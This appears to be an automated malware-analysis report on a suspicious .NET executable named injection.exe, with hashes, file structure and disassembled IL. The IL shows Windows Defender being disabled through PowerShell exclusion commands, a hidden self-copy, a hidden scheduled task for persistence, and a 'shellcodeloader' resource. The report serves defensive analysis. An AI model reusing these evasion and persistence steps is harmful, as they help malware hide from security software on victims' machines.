Suspicious
Suspect

0c6f9ab8c9e7d343f0ccae86803279c0

PE Executable
|
MD5: 0c6f9ab8c9e7d343f0ccae86803279c0
|
Size: 667.65 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Low

Hash
 Hash Value
MD5
0c6f9ab8c9e7d343f0ccae86803279c0
Sha1
fc2ca71cfcb1b5f514186c3a36700544026f597e
Sha256
34815fc9badaa5b7ef9b8394a1aa00bbf98917382f565e9b782293f0e623b5a3
Sha384
d4a0a2729e8ce705b85cf0c662741c7027f57adfe47bf0c43a9dff84148e300ad0f54615bc4cdd136f9cb9459eb18f2d
Sha512
89244210e500d416b638bfbe2925268fa784c2ba61aa80f39f5d856d55190db42179b9031964da998152c135b05e477050389b52b3439b0a35817a229b45049d
SSDeep
12288:HVcZgJZnprs9k+gltkfj9kcpP2EOxl/f0VPW3mpM:maZnpq/aiNpP2EOxZmWEM
TLSH
5FE4E11127E4892BEEAE13B4F5B0161027B4F54BA561EB8A78CC15FA9F6334059133BF
File Structure
0c6f9ab8c9e7d343f0ccae86803279c0
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
x;0#&462;&72&;.Resources
shellcodeloader
Microsoft.Win32.TaskScheduler.Properties.Resources.resources
Microsoft.Win32.TaskScheduler.V1.TaskSchedulerV1Schema.xsd
Microsoft.Win32.TaskScheduler.TaskService.bmp
Informations
Name
 Value
Module Name

injection.exe
Full Name

injection.exe
EntryPoint

System.Void x&4&;x64x7::#7#x;&6&67()
Scope Name

injection.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

injection
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

534
Main Method

System.Void x&4&;x64x7::#7#x;&6&67()
Main IL Instruction Count

204
Main IL

call System.Boolean x&4&;x64x7::66##2;;x26() brtrue IL_0010: ldsfld System.String 64;;;;&#6;::#&;267x&;& ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) ldsfld System.String 64;;;;&#6;::#&;267x&;& ldsfld System.String 64;;;;&#6;::126#46;676 ldstr \ ldsfld System.String 64;;;;&#6;::6x62#x##;; call System.String System.String::Concat(System.String,System.String,System.String) ldc.i4.0 <null> call System.Int32 Microsoft.VisualBasic.CompilerServices.Operators::CompareString(System.String,System.String,System.Boolean) ldc.i4.0 <null> bne.un IL_0096: call System.Boolean x&4&;x64x7::#x;##x;;a4() ldsfld System.Collections.Generic.List`1<System.String> 64;;;;&#6;::662#&4;&#& callvirt System.Collections.Generic.List`1/Enumerator<System.String> System.Collections.Generic.List`1<System.String>::GetEnumerator() stloc.0 <null> br IL_0070: ldloca.s V_0 ldloca.s V_0 call System.String System.Collections.Generic.List`1/Enumerator<System.String>::get_Current() stloc.1 <null> ldnull <null> ldftn System.Void x&4&;x64x7::6#;x&a4&3#(System.Object) newobj System.Void System.Threading.ParameterizedThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ParameterizedThreadStart) stloc.2 <null> ldloc.2 <null> ldloc.1 <null> call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Byte[] x&4&;x64x7::#07a4661#7(System.String) callvirt System.Void System.Threading.Thread::Start(System.Object) ldloca.s V_0 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.String>::MoveNext() brtrue.s IL_0045: ldloca.s V_0 leave IL_008C: call System.Void System.Windows.Forms.Application::Run() ldloca.s V_0 constrained. System.Collections.Generic.List`1/Enumerator<System.String> callvirt System.Void System.IDisposable::Dispose() endfinally <null> call System.Void System.Windows.Forms.Application::Run() br IL_0312: ret call System.Boolean x&4&;x64x7::#x;##x;;a4() brtrue IL_00B6: call System.Boolean x&4&;x64x7::#x;##x;;a4() ldsfld System.String 64;;;;&#6;::#&;267x&;& call System.Boolean x&4&;x64x7::2#66#;4&&#(System.String) pop <null> call System.Void x&4&;x64x7::##422&;;76() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Boolean x&4&;x64x7::#x;##x;;a4() brfalse IL_014D: ldsfld System.String 64;;;;&#6;::126#46;676 newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() stloc.3 <null> ldloc.3 <null> ldstr powershell.exe callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) ldloc.3 <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) ldloc.3 <null> ldstr -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath ' ldsfld System.String 64;;;;&#6;::126#46;676 ldstr \ ldsfld System.String 64;;;;&#6;::6x62#x##;; call System.String System.String::Concat(System.String,System.String,System.String) call System.String System.IO.Path::GetFullPath(System.String) ldstr ' call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.3 <null> call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) callvirt System.Void System.Diagnostics.Process::WaitForExit() ldloc.3 <null> ldstr -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess ' ldsfld System.String 64;;;;&#6;::6x62#x##;; ldstr ' call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.3 <null> call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) callvirt System.Void System.Diagnostics.Process::WaitForExit() leave IL_014D: ldsfld System.String 64;;;;&#6;::126#46;676 dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_4 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_014D: ldsfld System.String 64;;;;&#6;::126#46;676 ldsfld System.String 64;;;;&#6;::126#46;676 ldstr \ ldsfld System.String 64;;;;&#6;::6x62#x##;; call System.String System.String::Concat(System.String,System.String,System.String) call System.Boolean System.IO.File::Exists(System.String) brfalse IL_0199: ldc.i4 1000 ldsfld System.String 64;;;;&#6;::126#46;676 ldstr \ ldsfld System.String 64;;;;&#6;::6x62#x##;; call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_5 ldloc.s V_5 ldc.i4 128 callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) ldloc.s V_5 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.String 64;;;;&#6;::126#46;676 ldstr \ ldsfld System.String 64;;;;&#6;::6x62#x##;; call System.String System.String::Concat(System.String,System.String,System.String) ldsfld System.String 64;;;;&#6;::#&;267x&;& call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave IL_01DD: ldsfld System.String 64;;;;&#6;::126#46;676 dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_6 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_01DD: ldsfld System.String 64;;;;&#6;::126#46;676 ldsfld System.String 64;;;;&#6;::126#46;676 ldstr \ ldsfld System.String 64;;;;&#6;::6x62#x##;; call System.String System.String::Concat(System.String,System.String,System.String) ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) leave IL_020E: newobj System.Void Microsoft.Win32.TaskScheduler.TaskService::.ctor() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_7 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_020E: newobj System.Void Microsoft.Win32.TaskScheduler.TaskService::.ctor() newobj System.Void Microsoft.Win32.TaskScheduler.TaskService::.ctor() stloc.s V_8 ldloc.s V_8 callvirt Microsoft.Win32.TaskScheduler.TaskDefinition Microsoft.Win32.TaskScheduler.TaskService::NewTask() stloc.s V_9 newobj System.Void Microsoft.Win32.TaskScheduler.TimeTrigger::.ctor() stloc.s V_10 ldloc.s V_10 callvirt Microsoft.Win32.TaskScheduler.RepetitionPattern Microsoft.Win32.TaskScheduler.Trigger::get_Repetition() ldc.r8 1 call System.TimeSpan System.TimeSpan::FromMinutes(System.Double) callvirt System.Void Microsoft.Win32.TaskScheduler.RepetitionPattern::set_Interval(System.TimeSpan) ldloc.s V_9 callvirt Microsoft.Win32.TaskScheduler.TriggerCollection Microsoft.Win32.TaskScheduler.TaskDefinition::get_Triggers() ldloc.s V_10 callvirt Microsoft.Win32.TaskScheduler.Trigger Microsoft.Win32.TaskScheduler.TriggerCollection::Add(Microsoft.Win32.TaskScheduler.Trigger) pop <null> call System.Boolean x&4&;x64x7::#x;##x;;a4() brfalse IL_0265: ldloc.s V_9 ldloc.s V_9 callvirt Microsoft.Win32.TaskScheduler.TaskPrincipal Microsoft.Win32.TaskScheduler.TaskDefinition::get_Principal() ldc.i4.1 <null> callvirt System.Void Microsoft.Win32.TaskScheduler.TaskPrincipal::set_RunLevel(Microsoft.Win32.TaskScheduler.TaskRunLevel) ldloc.s V_9 callvirt Microsoft.Win32.TaskScheduler.TaskSettings Microsoft.Win32.TaskScheduler.TaskDefinition::get_Settings() ldc.i4.1 <null> callvirt System.Void Microsoft.Win32.TaskScheduler.TaskSettings::set_Hidden(System.Boolean) ldloc.s V_9 callvirt Microsoft.Win32.TaskScheduler.ActionCollection Microsoft.Win32.TaskScheduler.TaskDefinition::get_Actions() ldsfld System.String 64;;;;&#6;::126#46;676 ldstr \ ldsfld System.String 64;;;;&#6;::6x62#x##;; call System.String System.String::Concat(System.String,System.String,System.String) ldnull <null> ldnull <null> newobj System.Void Microsoft.Win32.TaskScheduler.ExecAction::.ctor(System.String,System.String,System.String) callvirt Microsoft.Win32.TaskScheduler.Action Microsoft.Win32.TaskScheduler.ActionCollection::Add(Microsoft.Win32.TaskScheduler.Action) pop <null> ldloc.s V_8 callvirt Microsoft.Win32.TaskScheduler.TaskFolder Microsoft.Win32.TaskScheduler.TaskService::get_RootFolder() ldsfld System.String 64;;;;&#6;::#x42;xx26& ldloc.s V_9 callvirt Microsoft.Win32.TaskScheduler.Task Microsoft.Win32.TaskScheduler.TaskFolder::RegisterTaskDefinition(System.String,Microsoft.Win32.TaskScheduler.TaskDefinition) pop <null> ldc.i4 3000 call System.Void System.Threading.Thread::Sleep(System.Int32) call System.Void x&4&;x64x7::##422&;;76() ldloc.s V_8 ldsfld System.String 64;;;;&#6;::#x42;xx26& ldc.i4.1 <null> callvirt Microsoft.Win32.TaskScheduler.Task Microsoft.Win32.TaskScheduler.TaskService::FindTask(System.String,System.Boolean) stloc.s V_11 ldloc.s V_11 brfalse IL_02E1: ldc.i4.0 ldloc.s V_11 ldc.i4.0 <null> newarr System.String callvirt Microsoft.Win32.TaskScheduler.RunningTask Microsoft.Win32.TaskScheduler.Task::Run(System.String[]) pop <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) leave IL_02FB: leave IL_0312 ldloc.s V_8 brfalse IL_02FA: endfinally ldloc.s V_8 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave IL_0312: ret dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_12 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave IL_0312: ret ret <null>
0c6f9ab8c9e7d343f0ccae86803279c0 (667.65 KB)
File Structure
0c6f9ab8c9e7d343f0ccae86803279c0
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
x;0#&462;&72&;.Resources
shellcodeloader
Microsoft.Win32.TaskScheduler.Properties.Resources.resources
Microsoft.Win32.TaskScheduler.V1.TaskSchedulerV1Schema.xsd
Microsoft.Win32.TaskScheduler.TaskService.bmp
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙